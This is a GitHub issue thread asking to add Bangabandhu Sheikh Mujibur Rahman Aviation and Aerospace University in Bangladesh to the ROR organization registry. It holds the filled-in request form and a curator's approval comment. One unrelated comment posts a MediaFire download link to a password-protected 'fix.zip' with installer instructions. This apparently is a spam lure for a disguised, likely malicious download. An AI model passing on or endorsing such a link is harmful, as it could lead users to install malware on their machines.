### ISSUE TITLE
Add a new organization to ROR: Bangabandhu Sheikh Mujibur Rahman Aviation and Aerospace University

### ISSUE THREAD

**Issue by cknopp-schwyn** [ror-community/ror-updates#13675]
Summary of request: Add a new organization to ROR

Name of organization: Bangabandhu Sheikh Mujibur Rahman Aviation and Aerospace University*en
Website: https://bsmraau.gov.bd
Domains: bsmraau.gov.bd
Link to publications: https://doi.org/10.1109/NEleX59773.2023.10421680 https://doi.org/10.1504/IJWMC.2024.137882 https://doi.org/10.1063/5.0193748
Organization type: Education
Organization status: Active
Wikipedia page: https://en.wikipedia.org/wiki/Bangabandhu_Sheikh_Mujibur_Rahman_Aviation_and_Aerospace_University
Wikidata ID: Q67654472
ISNI ID: 0000 0005 0597 4178
GRID ID:
Crossref Funder ID:
Other names for the organization:
Aliases:
Labels: বঙ্গবন্ধু শেখ মুজিবুর রহমান অ্যাভিয়েশন অ্যান্ড অ্যারোস্পেস বিশ্ববিদ্যালয়*bn
Acronym/abbreviation: BSMRAAU*en
Related organizations: 
City: Lalmonirhat
Country: Bangladesh
Geonames ID: 1185181
Year established: 2019
How will a ROR ID for this organization be used? 
Other information about this request:

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rileymmarsh** [comment]
University dedicated to aerospace engineering in Bangladesh. Funds and employs researchers. Solid affiliation usage. Should be added.
